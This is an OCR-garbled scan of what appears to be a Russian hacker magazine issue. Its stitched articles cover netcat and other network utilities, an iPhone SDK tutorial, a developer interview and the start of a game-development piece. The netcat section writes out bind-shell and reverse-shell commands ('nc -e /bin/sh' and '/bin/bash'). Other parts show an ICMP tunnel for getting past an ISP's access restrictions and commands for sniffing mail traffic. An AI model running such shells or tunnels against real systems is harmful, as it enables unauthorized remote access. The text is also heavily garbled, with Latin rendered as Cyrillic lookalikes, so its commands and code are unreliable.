Ьіп/сѵзігас.сді/кпоск/ 
ѵѵікі 



Сетевая версия саі оказаласьтем инструментом, заме- 
ну которому вряд ли можно найти. Обладая предельной 
простотой, он невероятно богат на функционал, а диапазон 
его применения столь широк, что в народе пеісаі: окрестили 
«Швейцарским армейским ножом». Утилита пеісаі: по сути 
не делает ничего, кроме копирования данных в порти из 
него, но при этом с ее помощью можно — 

1. Передавать файлы: 

$ пс -1 31334 > іііепате 
$ пс 172.16.69.143 31334 < іііепате 

2 . Использовать вместо Іеіпеі: 

$ пс -1 -р 31334 -е /Ъіп/зк 
$ пс 172.16.69.143 31334 

3. Сканировать на открытые порты: 



• пдгер.зоигсеЬгде.пе $ пс -2 ѵ™. хакер. ги 1-1024 



/екс/іпексі. сопі 

# кіііаіі -ШР іпексі 

Теперь весь трафик, пришедший на порт 2525, будет пере- 
направляться на стандартный 5МТР-порт25. Таким же об- 
разом мы можем завернуть трафике любого порта на другой 
порт/машину, просто видоизменив первые две команды. 
Пользователи дистрибутивов Ыпих могут вообще не замо- 
рачиваться с пеШаТ демон хіпеіеі, ставший стандартом де 
факто для Ыпих-систем, сам умеет перенаправить сетевой 
трафик: 

# ѵі /еіс/хіпеісі/гесіігесі 

зегѵісе гес1ігесЦ-2525-Цо-25 
{ 

сІізаЫе = по 
Суре = ШГЫЗТЕБ 
зоскек_Ьуре = зкгеат 
ргокосоі = Сер 
маік = по 



I 

• зграгізЬ.пеіУзсгірІз 4 . Осуществлять фингерпринт сервисов на основе банне- 

ров: 

• ѵѵѵѵѵѵ.Ьагбіпд.ппоіА. 

са/аиіоззЬ есТю «ОІЛТ» | пс ѵтѵі . хакер . ги 1-1024 



• ѵѵѵѵѵѵ.сз.иіТпо/ 5 . Организовывать рекурсивный шелл: 

-бапіеІз/РіпдТиппеІ 

$ пс -е /Ып/ЬазЬ 172.16.69.143 
$ пс -1 -р 80 



рогС = 2525 

гесіігеск = 127.0.0.1 25 
изег = поЬосіу 



И 6КЕР, 5Е0 И ТОР НА СЛУЖБЕ СЕТИ 

Кроме рассмотренного выше пеШар известно еще несколь- 
ко примеров удачного порти рования ШЧІХ-утилит в сетевой 
мир. В первую очередь, это программы пдгер и пеізеб, 
предназначенные для поиска и замены текстовых элемен- 
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?? ипіхоігі 




П1ИРІ0С11ЙО*Х)-(-)- 
(0:130) *> $и<1о рхипгм 
1] 59522 



рхиллеі р 127.0.0.1 -1р 0000 сіа 127.0.0.1 -<*> 22 І, 



1] 5П__ 

п ІяОІосаІЬоіі) -(**)- 
(1:130)-> Ип*]: ітаггіпд ргиппеі ѵ 0.60. 

1пП: (с) 2004-2005 Оалісі «оегііс. гіапіеЬвсі.иІГ.по 
ЧпГ): кеіауіпд раскеіі (гот Ігксміпд тср &тгеак. 

(11а0І0Са1№$Г)-(~)- 
(1:130) *> »»Ь -р 8000 127.0.0.1 
іпсовіпд сооо«сх1оп. 
іпіпд 



І 



хпгедо - ігагтіпд и 



ргоху х 

....... \і і 11*1 

гЬ» «игНалтІсІту о* Г 
05А кеу Ппдвгргіш 1 
дге уои *иге уои «апт то солтіпие еоппеетіж 
«ыгпіпд: Ргпылспііу .мкімі ' 1127.0.0.1] :8Г 
п а4ѵ*огсІ:| 



Ч: Мпд ргоху 1$ 11$т««1лд 1п ргіѵііедсс) воОе. 

аитЬсптІсІту <* Но»т ' [127.0.0.11 :*000 ([127.0.0.1] :8000)' сап’т Ь* 

кеу Ппдегргіпт 1$ 84:07:74:05:е7:*а:Г<1:Ь9:Ь4:Ь5:76:62:а5:М:75:19. 



Ьа *ітлЫііЬс4. 



(уе*/по)? уе? 

’ (05А) то ТНв 11 51 оГ кікямп ЬоЯ4. 







Ѵ ГЪ V, 




Синтетический тест ргиппеі 




Настраиваем демон кпосксі 



тов внутри проходящих пакетов, и пеНор — утилита, осуществляющая 
мониторинг сетевых соединений. 

Инструмент пдгер предназначен для тех, кому Ісрсіитр кажется слишком 
уж гиковой игрушкой. Это сетевой снифер, позволяющий производить 
поиск внутри пакетов с помощью регулярных выражений. Пользоваться 
им нетруднее, чем стандартным дгер, и гораздо проще, чем другими 
подобными программами. Он поддерживает большинство опций своего 
локального аналога, а также несколько специальных команд, позволяю- 
щихуказать прослушиваемый порт, сетевой интерфейс, адрес полу- 
чателя и прочие сетевые параметры. Основан снифер на легендарной 
библиотеке рсар и поддерживает протоколы ТОР, СЮР, ІСМР 
Чтобы оценить красоту пдгер, попробуй запустить следующую команду и 
побродить по интернету: 

# пдгер хакер, ги рогк 80 

А вотдругая команда, позволяющая прослушать весь 5МТР-трафик: 

# пдгер -і \ ’ гсрС Соішаіі Пгош\ ’ -сі апу Сер рогР зшрр 

Утилита предельно проста в использовании: указать маску и нужный порт 
обычно достаточно, чтобы найти то, что хочешь. Будут полезными также 
флаги 1 -і 1 для игнорирования регистра символов, 1 -с 1 для вывода 
времени прихода/отправки для каждого пакета и 1 -Ѵ7 Ьуііпе 1 , принуж- 
дающий пдгер распечатывать содержимое пакетов по одному на строку. 

У тебя наверняка возник вопрос, можно ли таким же способом не только 
искать информацию в пакетах, но и изменять ее части на свой вкус. Ответ 
здесь неоднозначен, но он скорее будет «Да», чем «Нет». Существует 
простая до безобразия утилита пеізеб, созданная по мотивам потокового 
редактора зеб. Воттолько в режиме «Мап I п ТЬе Мібсііе» она работать не 
может, потому как не использует низкоуровневые сетевые возможности 
ядра. Вместо этого она просто слушаетзаданный порти передает из- 
мененный поток пакетов на другой порт/машину (т.е. работает в режиме 
прокси]. 

В свете вышесказанного, — до того какмы сможем применять пеізеб в 
боевыхусловиях, необходимо настроить ОСтак, чтобытрафик, в недрах 
которого мы хотим ковыряться, автоматически заворачивался в пеізесі. 
Например, если на машине давно и исправно работаетзппір-сервер, а 
нам, ленивым админам, вдругни стого ни с сего захотелось в нем что-то 
изменить, будет не козырно переопределять его порт на 2525, а сам 
пеізеб вешать на 25-ый порте последующей отправкой пакетов на порт 
2525. Вместо этого мы просто завернем входящий гтір-трафик на порт 
2525, который будет слушать пеізеб, а он, в свою очередь, уже отдаст его 
зппір-серверу. Сделатьэто можно либо с помощью любого брандмауэра, 
либо по описанной в предыдущем разделе схеме пеісаін-іпеісі. 

Послетого какзаработает перенаправлениетрафика, мы запустим 
пеізеб следующей командой: 

$ пекзесі Сер 2525 127.0.0.1 25 з/ѵазуа@Нюзк . сот/Ъогіз@ 

ковЬ . сот 

Теперь все встречающиеся адреса ѵазуайНозТсот будут заменены на 
ЬогізйНозі.сот. 



ЫеИор — третья по счету утилита, созданная с использованием 
идей, заложенных в стандартные ІІЫІХ-утилиты. По сути, перед 
нами простой коллектор информации о сетевых соединениях и 
количестве трафика, прошедшего через порты. А заслуживает 
упоминания он только потому, что делает это в реальном времени 
и очень наглядно. 

В ВКУСНОСТИ 

Плохое качество соединения может стать настоящей проблемой, когда 
в фоне запущен ззб, организующий туннель, который мы постоянно 
кормим новым трафиком. Поток пакетов может просто «застрять» 
ровно до того момента, пока мы не перезапустим клиент, или пока 
через узкий канал не закончит проходить порно-фильм, который льет 
сидящий за стеной сосед. Постоянно смотреть в монитор и следить, 
все ли в порядке, мы тоже не можем и, что важнее, не хотим. Поэтому 
переложим работу по слежке и перезапуску ззб на плечи специальной 
программы аиіоззб. 

Утилита аіЛоззб представляет собой враппер для ззб-клиента, 
который просто следитза состоянием соединения с помощью 
посылки коротких сообщений от клиента к серверу и обратно (что-то 
вроде пинга). Если «пинг» не возвращается или приходит с большой 
задержкой, аіЛоззб обрывает соединение и пытается его восстано- 
вить. Утилиту очень легко использовать: все, что нужно, — запускать 
команду а и 1:055 Ь вместо 55 Ь со всеми стандартными аргументами 
последней. 

Долго думал, стоит ли включать ріііппеі в обзор, но все-таки решил 
включить. Дело в том, что ріиппеі (Ріпд Типпеі] — это утилита, о 
которой мечтали лет 1 0 назад, когда вся Россия поголовно сидела 
надиалапе. В те далекие времена многие провайдеры выделяли 
специальный телефонный номер для тестирования соединения и 
проверки баланса своего счета. Все это было полностью бесплатно, 
потому что пользователь мог получить доступ только к сайту статис- 
тики, а все остальные соединения жестко обрезались. Но ошибка 
админов была в том, что зачастую они оставляли возможность 
посылать «пинги» и БЫЗ -запросы на любой адрес внешней сети. 
Программа ріиппеікакрази эксплуатирует эту «уязвимость» через 
инкапсуляцию ТС Р- па кето в в ІСМР Есбо запрос, создавая туннель 
во внешний мир. 

Чтобы организовать туннель через ріиппеі, необходимо проделать 
несколько действий: 

1. Запустить сервер ріиппеіна каком-нибудь внешнем интернет- 
сервере: 

# ркиппеі 

2. Установить соединение с сетью, пропускающей во внешний мир толь- 
ко пинги и запустить клиент: 

# ркиппеі -р внешний . сервер . сот -1р 1110 -сіа рор.таіі.ги 
— сір 110 

3. Настроить таіі-клиентна адрес 172.0.0.1 : 1 1 1 0 и благополучно забрать 
почтѵс сервера рор.таіі.ги . Скорость будет не ахти, но для почты и ее 
достаточно. ЗЕ 
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ПОДНИМАЕМ 
БАБЛО СіРІіопе 



ВВЕДЕНИЕ В КОММЕРЧЕСКИЙ КОДИНГ С ПОМОЩЬЮ 



ОФИЦИАЛЬНОГО 5БК 



Правильный читатель еще в августе впечатлился статьей в ЗЕ и сегодня уже 




вовсю толкает свои программы в Арріе Зіюге. Нет? Впечатлился, но не на- 



столько? Или впечатлился, но не толкаешь? Ах да, мы же про официальный 



ЗБК почти ничего не рассказали. Простите, исправляемся! 



очему никто не сомневается втом факте, что писать«офици- 
альные» программы под айфон означает«получать бабло»? 
Ознакомимся с примером. Жил да был на свете перецс име- 
нем Стив Деметр (никогда, кстати, не замечал, что прогеры 
с именем «Стив» становятся суперуспешными?). Жил он себе, кодил 
понемногу, ну и накодил в результате очередной клон на темутетриса, 
оценил его в скромные $5 и отправил в АррВіоге. Сидит он, стало быть, у 
разобранного системника, чай пьет, а емутем временем приходитчекна 
$250 000 — мол, получите: вашу программу за два месяца скачала туева 
хуча людей, вот ваше бабло. 

Мило? Вот именно! А кактебе нравятся заголовки в американских табло- 
идах (ѴѴігесІ, кпримеру) вроде «Кризис? Только недля іРЬопе-програм- 
меров!». И там, за океаном, и тут, ближе к Москве и Киеву, айфон-деве- 



лоперы в почете. Всем охота создать крутую программу и получить с нее 
огромное бабло. Ну что, теперь впечатлился? То-то же! Давай быстрень- 
ко разнесем по полочкам все основные понятия и примемся за кодинг. 

Е ОСНОВНЫЕ ПОНЯТИЯ 

Для тех, кто далекот истерии вокруг іРЬопе и не страдаетфанатизмом по 
отношению к яблочной продукции, напомним, что сначала іРЬопе по фи- 
чам недотягивал даже до статуса нормального телефона. После старта 
продажлетом 2007 года он представлял собой недоделанный телефон- 
плеер с качественным браузером, продавался только в США и только с 
привязкой коператору. Со временем умные люди отучили его жаловать- 
ся оператору на чужую 5 1 М - ка рту, научились писать и устанавливать 
программы и вообще, настраиватьтелефон под свои нужды. 
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В проекте выбираем файлы ресурсов, которые открываются в редакторе 
графического интерфейса 



Настраиваем свойства формы 



Встроенные в Хсосіе мануалы 



Добавляем в файлы проекта картинку 



Мучиться пришлось до мая 2008 года, пока сама Арріе не предоставила 
собственный вариант 50К. Это было хорошо, да не очень. Фирменный 
набор для разработчика оказался жутко ограничен по фичам, кодерам 
запрещали делать все, что не документировано в официальных бумаж- 
ках, создавать многопоточные приложения и даже реализовывать нор- 
мальный мультитаскинг. Самое важное яблококомпания оставила строго 
себе и даже запретила продвинутым проггерам вы пускать толковые 
книжки про официальный ВОК (круто, да?]. Правда, в октябре переду- 
мала и пропустила на рынок первую книгу, о которой читай ниже. Аеще 
она просматривает весь софт, который пишется с Арріе ВОК. То есть, 
допустим, ты сидел-писал, что-то прикольное вышло, отправляешь в 
АррВіоге, а тебе приходит оттуда ответ в духе: «поменьше читай журналы 
вроде ПЕ, за такие проги вообще сажать за решетку пора, не пропустим». 
И ты начинаешь дорабатывать напильником своетворение, чтобы его 
приняли. Неприятно, но никто не обещал легкой жизни. Создавай что-то 



Так выглядит программа ценой в $5 за штуку 

простое, чтобы американцам захотелось отдать за твой кусоксофта свой 
кровный бакс или даже парочку. В основном, в магазине п рог для ифона 
все и стоит по $2-5, софтинки покруче — $10, а что-то совсем стоящее 
— уже по$30-50. На наш взгляд, $5 — предел для средней программки. 
Больше редко кто платит. Хотя нашлись индивиды (сложно их иначе на- 
звать], которые догадались купить программу за один миллион долларов 
США. Программа почти ничего не делает, но называется «я богат». Ну, 
статусная вещь, вроде как. Правда, дальше нетак весело. Дело втом, что 
фирменная студия разработки (Хсобе] и сам іРбопе 5Б К работа юттолько 
на Мас’е. Еслиутебя под столом имеется лишь коробка с логотипом ѴѴіп, 
то придется ста вить Хаки нто ш — адаптированную для РС версию Мае 
05, или мучаться с ѴМѴѴаге. Оба этих варианта не гарантируютуспеха. 
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Создаем проект, основанный на флип-окне 



Плюсы и минусы 

Экран айфона — его главное преимущество и главный же недостаток. Пре- 
имущества — пользователю, недостатки — как водится, нам. Круто и инте- 
ресно в визуальном редакторе создавать многооконный интерфейс, красивые 
переходы, кнопочки и прочее счастье. Но когда счастья становится слишком 
много, визуальный редактор форм начинает бесить своей услужливостью и 
автоматизацией, во множестве элементов начинаешь путаться, — да и вся 
эта анимация и настройки переходов тоже добавляют работы. Кроме экрана, 
хлопот может доставить только капризный СР5 и необходимость крайне акку- 
ратного обращения к частным аппаратным возможностям. Дабы программа 
корректно работала на всех версиях іРосі и ІРЬопе, надо, чтобы она была в курсе, 
что можно трогать, а что нет. Это все придется прописать. А еще в мобильной 
Мае 05 нет сборщика мусора, — следи за памятью сам, удаляй объекты, ищи 
лики, думай, где твоя прилага нагадила. Не кривись, в ЗутЪіап все еще сложнее 
и глупее реализовано. 




О 



> сіѵсі 

На компакт-диске ле- 
жат полные исходные 
коды, файл проекта 
и скриншоты. Для их 
компиляциитебе пона- 
добится 5 О К и студ и я 
разработки Хсобе. 




> Ііпкз 

Документы, мануалы, 
примеры и прочее 
можно найти на сайте 
Арріе — беѵеіорег 
арріе.сот/ірбопе . 



выпустить новый билд своей программы. Фишка втом, что 
эмулятор не гарантирует работоспособность программы на 
реальном девайсе и даже не показываетее реальную ско- 
рость работы — вычислительные способности твоего компа 
явно помощнее ІРбопе будут. 

Иначе говоря, по-хорошему надотестить под ІРбопе, ІРбопе 
30 и іРосі іоисб, но если подходить к делу с умом, и все 
обращения к железу аккуратно упаковывать с эксэпшнами, 
то можно обойтись и одним устройством. Дело втом, что в 
новом ифоне появился ОРЗ, в старом его не было. В иподе 
старом нет ни сотовой связи, ни динамика, ни камеры, и 
если твоя великолепная программка обратится к несущест- 
вующей аппаратуре, у гаджета Арріе случится паника. В 
лучшем случае подвиснеттолькотвоя программа, в худшем 
— зависнет весь девайс. Даже на требование ребута он 
реагировать не станет, придется ресет делать. За такую 
шалостьобиженный юзер околотвоей программы нарисует 
гневный камментс вытянутым средним пальцем и объяснит 
прохожим, что программу покупать не стоит. 

В Сети бродят слухи, что для получения дозволения кодить 
под ІРбопе всем надо заплатить мзду в размере $99. Это не 
совсем так, кодить можно бесплатно, но вот за доступ кАррІе 
Зіоге придется забашлять. Ничего не поделаешь. 

Итак, ты понял, что неофициальный ЗЭКне позволиттебе 
получатьза свои проги какие-то деньги и вообще разме- 
щать их в официальном магазине программ. На самом деле, 



такназываемый ІРбопе іооіебаіп — это просто туча нагене- 
реныххедеров и руками прикрученный АРМ-компилятор, 
а официальный ЗЭК — это полноценный инструментарий, 
хоть и с ограниченным функционалом. Тул чей н не ограни- 
чиваеттебя в твоих действиях, правда, недля всехдействий 
он предлагает инструменты. Короче говоря, нет в жизни 
счастья, есть компромиссы. Такчто, сделаем три глубоких 
вдоха-выдоха и приступим космотру Арріе ІРбопе ЗйК. 

В ОТКУДА БЕРУТСЯ 5БК И МАНУАЛЫ 

Все доки, мануалы, Хсобе и сам 5РК качаются с беѵеіорег 
арріе.сот/ірбопе . Там выложена и пара видеоматериалов, 
где понятным английским рассказано, чем, где и куда надо 
кликать. Если по инглишу в школе было два балла, то просто 
посмотри двигающиеся картинки — они на самом деле по- 
могают. Кроме того, на сайте есть примеры кода, на которых 
можно увидеть, что собой представляет язык О^есбѵе-С. 
Комментарии в коде достаточно слабые, они созданы не 
для того, чтобы помочь новичку, а чтобы человек просто мог 
понять, про что этот код. Значит, придется повозиться. 

Что же касается мануалов и гайдов, то кроме россыпи 
специализированных форумов и чатов, тебе поможетфир- 
менная яблочная документация стого же сіеѵеіорег.арріе. 
сот/ірбопе . Она чем-то напоминает М50ІЧ от МісгозоЬ. 

Если этого покажется мало, глянь на бестселлер от Сти- 
вена Кочана — «Ргодгаттіпд іп ОЬдесІіѵе-С 2.0». Про 
интерфейс Сосоа лучшей считается книга Аарон Хиллегэз с 
названием «Сосоа Ргодгаттіпд Іюг Мае 05Х». 

По поводу специализированных книг по разработ- 
ке именно для іРбопе, можно глянуть на «ТЬе ІРЬопе 
Эеѵеіорег’з СоокЬоок: ВиіШіпд Арріісаііопз ѵѵііЬ іЬе 
ІРЬопе ЗЭК» от Эрики Сэдун, но она подойдеттолько 
достаточно опытным кодерам. Новички запутаются в 
слабо прокаменченых примерах, кусках кода и не разбе- 
рутся в поучениях автора. Кстати, популярная «ІРЬопе 
Ореп Арріісаііоп Эеѵеіортепі: ѴѴгіІе Маііѵе ОЬіесЬѵе-С 
Арріісаііопз !ог іЬе ІРЬопе» от Джонатана Здзярского 
рассказывает только про тулчейн, с официальным ЗйК 
онаособоне поможет, поэтому не ошибись случайно. Из 
всей этой книги разве что пара моментов про 0Ь]ес1:іѵе-С 
будут полезны. 

В общем, когда разберешься в организации классов, клю- 
чевых словах и структуре программы, идея программы для 
іРбопе перестанет казаться идиотской, а Хсобе прекратит 
бесить. Арріе позаботилась об огромном количестве функ- 
циональных библиотек и удобных обертках над функци- 
ями ядра. В самом начале этого тебеточно хватит. Когда 
потребуется нечто эдакое, на помощь придетлюбимый С++, 
который умеет обращаться напрямую кфункциям ядра. 
Правда, связывать код на ОЬ]есііѵе-С и на С++ нетак просто, 
придется немного поизвращаться. 
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Процесс отладки 



НПОКОДИМ! 

Настало время реализации практической части. Итак, открываем Хсосіе, 
создаем проект, основанный на флип-окне. Где ресурсы, где код, а где 
хедеры — разобрался? Молодец! Конечноже, главный файл проекта 
имеет расширение .хсобергоі файлы с кодом — расширение .т, заго- 
ловки с расширением .Ьты точноузнал, а .хіЬ — что-то вроде скомпиле- 
ного класса, в нем могут быть строки, формы да и сам код класса. Часть 
кода ты делаешь ручками, а часть — автоматом через I п1;егГасе ВиіШег. 
Так вот, автоматическая часть сюда и упаковывается. 

Какдобавлять картинку и перетянуть ее на форму — тебя учить не нужно, 
если непонятно — смотри скриншоты. Редактируется все интуитивным 
мышиным кликом. Что ж, компилируем. 

Для запуска приложения выбираем целевое устройство и рабочую вер- 
сиюЭОК. Создавать приложения лучше для іРЬопе2.0,таккакв2.1 есть 
некоторые фишки, лишенные обратной совместимости с 2.0, отягощен- 
ным более старыми версиями прошивки. 

Полюбовался, работает? Теперь можно покопаться в коде.Улюбой 
программы точка входа находится в файле таіп.т (функция таіп]. В ней 
выделяется память для объектов с дефолтным деструктором (надо же их 
за тобой как-то убирать] и создается шаблон приложения высшего уров- 
ня вместе с ключевыми объектами (функция ІЛАррІісабіопМаіп). 
Приложения для іРЬопе однопоточные, поэтому выход из этой функции 
означаетзавершение программы: 

іпЦ шаіп(іпЦ агдс , сйаг *агдѵ[] ) 

{ 

ЫЗАибогеІеазеРооІ * рооі - 

[ [ЫЗАибогеІеазеРооІ аііос] іпіб] | 
іпб гебѴаІ = ІЛАррІісабіопМаіп 
(агдс, агдѵ, піі, піі); 




Редактируем два экрана для основного вида и для обратного 



[рооі геіеазе] ; 
геСигп гебѴаІ; 

} 

Далее разберем такое понятие, какАррІісабоп Оеіедаію. Это нечто 
вроде базового класса для твоей программы (в примерах он уже создан]. 
Интерфейс главного делегата описан в НеІІоЭДогІсіАррВеІедаЦе . Ь, 
а тело — положено в НеІІоМогІсІАррВеІедаСе .ш. 

Такого понятия, как вызов метода другого класса, в 0Ь]ес1іѵе-С нет, все 
делается через делегаты и сообщения. То есть, ты посылаешь объ- 
екту сообщение, и если целевой класс его сумеет обработать — счи- 
тай, что своего ты добился. Кпримеру, Арріісабоп Оеіедаіе связан с 
ШАррІісаСіоп, именно он создает окно, интерфейс пользователя, 
отвечает за прерывания, сообщения акселерометра и прочее. 

( ѵо .1 с ) аррІісаСіопБісіРіпізІтЬаипсЬіпд : (ІЛАррІісабіоп *) 
арріісабіоп { 

// создаем контроллер видов 
МуѴіемСопбгоІІег *аѴіеілСопбго11ег = 

[ [МуѴіеѵ^СопСгоІІег аііос] іпіШібШіШате : @ 

" НеНоЭДогІсГ' Ьипсііе: [ЫЗВипбТе таіпВипсІІе] ] ; 
зеІТ .туѴіетлСопбгоІІег = аѴіемСопбгоІІег ; 

// Квадратные скобки — это и есть отправление сообщения 
//В данном случае объекту аѴіемСопбгоІІег 
// отправляется сообщение геіеазе 
[аѴіемСопбгоІІег геіеазе] ; 

[ [ІЛАррІісабіоп зйагесІАррІісабіоп] 
зебЗбабизВагЗбуІе : ІЛЗбабизВагЗбуІеВІаскОрадие] ; 

/ / Каждый вид контроллера является подвидом окна 
ІЛѴіем *сопбго11егзѴіеѵ\г = [шуѴіеѵ^СопбгоІІег ѵіеѵ/] ; 
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Владимир Кузнецов, ведущий іРЬопе 
йеѵеіорег компании СасшзЗой 



Чтобы тебе было легче представить свое вероятное будущее, мы 
расспросили ведущего іРЬопе беѵеіорег’а компании СасШзЗоЙ: про 
особенности итрудности программирования для девайса Арріе. Вла- 
димир Кузнецов, в миру более известный как Реаі (с некоторых пор 
— іРеаІ], около пяти летзарабатывал на бутерброде икрой скилами 
С++ и С# (из нихЗ года — С++ на уровне девелопера], а недавно решил 
все бросить и повернулся в сторону йаМобилки, очаровал менеджера 
и сходу попал на должность лидирующего разработчика. Он уже успел 
пообщаться с реальными заказчиками, провести пару собеседований 
при приеме на работу, поучаствовать в крупных проектах для ІРЬопе. В 
общем, камрад правильный, дурного не посоветует. 



РИЛ, РАССКАЖИ, В КАКИХ ПРОЕКТАХ ТЫ УЧАСТВОВАЛ, 



ЧТО ПИСАЛ САМ? 



ванного подхода. При программировании под ІРЬопе довольно часто 
встречаешься с паттернами (делегаты, МѴС, синглетон). 
Соответственно, необходимы определенные знания в С++, хорошее 
понимание принципов ООП, надо быть хотя бы знакомым с паттер- 
нами. Нуа в идеале — иметьхороший опыт программирования для 
компьютеров Арріе; язык, фактически, тотже, только некоторые 
классы отличаются. 



ОПЫТ КАКОГО ЯЗЫКАТЕБЕ ПРИГОДИЛСЯ? 



НА ЧТО ПОХОЖИ ЯБЛОЧНЫЕ СИ? 



На С, С++, С#. На что же еще им быть похожими? В большей степени 
понадобился опытС++, он фактически является прототипом О^есііѵе- 
С. Болеетого, возможно комбинирование кода С++ и ОЬіесбѵе-С в 
рамках одного проекта и даже класса. 



Начал с простого приложения для работы с микроблоггингом. Дальше 
началось интересное — программа для управления термостатом. У 
заказчика в СШАестьтакая штука, которая управляет множеством 
систем контроля температуры. В ней есть свой Ыір-сервер. Моя 
программа к нему присоединяется и управляет всей этой махиной, 
снимает текущие данные, позволяет настраивать новые. Сейчас они 
захотели более навороченную версию, но это уже не мой проект. Я в 
данный моментзанимаюсь разработкой игрового движка. В целях 
переносимости кода на другие платформы в качестве основного языка 
был выбран С++. В местах, более привязанных кконкретной платфор- 
ме, для іРЬопе-версии будет использован ОЬіесбѵе-С. Кроме этого, 
есть еще несколько параллельных небольших проектов под ІРЬопе. 



ІЛЕГКО ЛИ БЫЛО ПЕРЕХОДИТЬ НА ИФОНОВСКИЕ СИ?! 



Поначалу даже трудно, ибо слишком много нового: другая опера- 
ционная система, другая раскладка клавиатуры, другие горячие 
клавиши, другой синтаксис, много новых ключевых слов, терми- 
нология, которая противоположно пересекается с С# (например, 
то, что в С# называется интерфейсом, в ОЬіесСѵе-С зовется прото- 
колом, интерфейс же там применяется несколько в другом роде). 
Другая и логика внутренней архитектуры приложений (например, 
все классы обмениваются информацией через посылку сообще- 
ний). Но при наличии желания, стремления и усилий к этому всему 
очень быстро привыкаешь. 




ВНУШИТЕЛЬНО. ЛАДНО, ВЕРИМ, ТЫ ДОСТАТОЧНО КРУТ. А ДО ЭТОГО | 
ТЫ НЕ ВОЗИЛСЯ С МАКАМИ И ПРОЧЕЙ ПРОДУКЦИЕЙ АРРІ_Е, ВЕРНО? 



Да, с Маками особо поиграться не довелось, зато сейчас мне директор 
подарил іРоб ІоисЬ и МасВоок. Для работы, конечноже, хотя я и заби- 
раю обе игрушки с собой домой. 



КАКТЫ СХОДУ ПЕРЕШЕЛ НА НОВЫЙ ЯЗЫК, С ЧЕГО НАЧИНАЛ? 



Начинал с освоения 147 старниц мануала ОЬіесбѵе-С 2.0 Ргодгаттіпд 
Ба пдиаде, далее просмотрел 21 2 страниц ІРЬопе 05 Ргодгаттіпд Оиісіе. 
Всего-то :]. В принципе, для работы этого уже достаточно, остальное 
будет изучаться в процессе практики. Адля начала вообще хватит просто 
ознакомиться с примерами, посмотреть видеоуроки на сайте Арріе — и 
можно начинать. Я имею в виду не зеленых кодеров, а ребятс мозгом. 



НУДА, НАШИ ЧИТАТЕЛИ ИМЕННО ТАКИЕ. ЧТО ВООБЩЕ НУЖНО ИРУЩ 
ЗНАТЬ, КАКАЯ МИНИМАЛЬНАЯ БАЗАЗНАНИЙ ДОЛЖНА БЫТЬ, ЧТОБЫ 
ЗАНЯТЬСЯ КОДИНГОМ ДЛЯ ГАДЖЕТА АРРЁЁ?^^^^^^^^^Н 



ОЬіесбѵе-С — это расширение С++ в сторону объектно-ориентиро- 



ЧТО НРАВИТСЯ В ЯЗЫКЕ, В ОСОБЕННОСТЯХ 
ПРОГРАММИНГА ДЛЯ ИФОНА?ННШВ 



Нравится новый опыт. Люблю копаться в чем-то новом. Язык нра- 
вится, ОЬ)есІіѵе-С «заставляет» мыслить более объектно. Простые 
іРЬопе-приложения на паруэкранов делаются довольно легко, да 
еще и обладают всеми графическими красивостями, свойственными 
телефону Арріе. Красиво и удобно. 

Наверное, только общаясь с творениями Арріе, понимаешь, на- 
сколько непродуман интерфейс у МісгозоЛ и начинаешь сам созда- 
вать более грамотные интерфейсы, стараться улучшать юзабилити 
своих программ. 



ТЫ ПРОБОВАЛ НЕОФИЦИАЛЬНЫЙ СДК? ГДЕ ПРОГРАММИТЬУДОБ 
III I ІНИПИЦИЛИІ. 1 1 II Л —И 



Неофициальный 5БК — хлам, с помощью которого кое-как можно ра- 
ботать. С их помощью нельзя писать полноценные легальные прило- 
жения под іРЬопе. Самому, ксчастью, сэтим столкнуться не пришлось. 
Я работаю с Арріе іРЬопеЗОК. 



[міпсісж аЛЛЗиЪѵіем: сопСгоІІегзѴіеѵП ; 

[міпсісж шакеКеуАпсіѴізіЫе] ; } 

МуѴіемСопСгоІІег .ш — файл с кодом, собственно, контроллера 
нашего главного элемента формы. В нем содержится функционал этого 
приложения. Файл подробно прокомментирован и выложен на нашем 
ОѴО, поэтому не забудь глянуть. 

Мы добавили новый контрол для переворота экрана, а исходники 
для него и смежных классов сгенерилисьавтоматически. Главный 
вид — РІірзісІеѴіем, сюда вложены КооСѴіемСопСгоІІег (он 
управляет переворотами окошек, анимацией) и два вида — обратный, 



РІірзісІеѴіем, и прямой — МаіпѴіем. КооСѴіемСопСгоІІег 

определяет, какой из видов надо отобразить. Именно ему отправляются 
сообщения о смене вида. В результате, мы получили (и разобрались 
в устройстве) пример крайне простой, но работающей программки 
всего лишь с помощью нескольких щелчков мышью в среде раз- 
работки. На врезке ты можешь увидеть интервью с настоящим гуру 
айфон-кодинга, а мне же позволь откланяться. Будем надеяться, 
мы продолжим знакомство с гламурным кодингом под яблочный 
телефон в следующих номерах] [а кера. Не стесняйся, пиши свои 
просьбы и отзывы — оттвоихписемзависяттетемы, которые мы 
будем раскрывать в статьях. ИНИ 
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ЮРИЙ «ѴІІВЕМВО» ЯЗЕВ 

/ ѴА2ЕѴ50РТ@СМАІІ_.С0М / 

ТЕМНОЕ ИСКУССТВО 
ИГРОДЕЛА, часть 3 



ОДНОПОЛЬЗОВАТЕЛЬСКАЯ ИГРА: ДОСТИЖЕНИЕ АБСОЛЮТА 



Сегодня мы закончим разрабатывать однопользовательскую игру, доведя ее 
до совершенства. Добавим и реализуем пару классов, подключим несколько 
звуков (для поддержки геймплея), рассмотрим работу с дополнительными 



функциями и типами объектов библиотеки Багк СБК — и сделаем еще мно- 




В ОБЪЕКТЫ ИГРОВОГО МИРА 

С заголовочным файлом 0ате_ОЬрЬ мы встретились еще в прошлой ста- 
тье, но из-за жестких ограничений (в плане размеровжурнала] нам при- 
шлось отложить его рассмотрение до лучших времен. И они наступили! 
Этот заголовочный файл содержитобъявления всех констант, исполь- 
зуемых в игре, както: объекты, текстуры, звуки и параметры экрана. 
Все эти константы числовые (если помнишь, ранее я говорил о том, 
что все типы объектов в Оагк ОЭК представляются в виде чисел]. 
Кроме объявления констант, файл содержит описание абстрактно- 
го супер-класса (в терминах ^ѵа и в С++ это будет просто базовый 
класс]. Как и полагается, этот класс содержит минимум необходимых 
данных-членов и функций-членов, используемых всеми производ- 
ными классами. Это такие переменные, как: номертекущего объекта, 
положение объекта в трехмерном пространстве по осям х, у, г, угол 
поворота (только по оси У), индикаторы жизни и горения (переменные 
булево го типа] и переменная для хранения времени. Многие функции 



не только объявлены, но имеют реализацию прямо в заголовочном 
файле, что автоматически делает их встраиваемыми. Действительно, 
если функция выполняет одну единственную инструкцию, то почему 
бы не реализовать ее прямо здесь? Использование встраиваемых 
функций уменьшает необходимость в препроцессоре — экономятся 
ресурсы, связанные с вызовом функции. Эти функции выполняютта- 
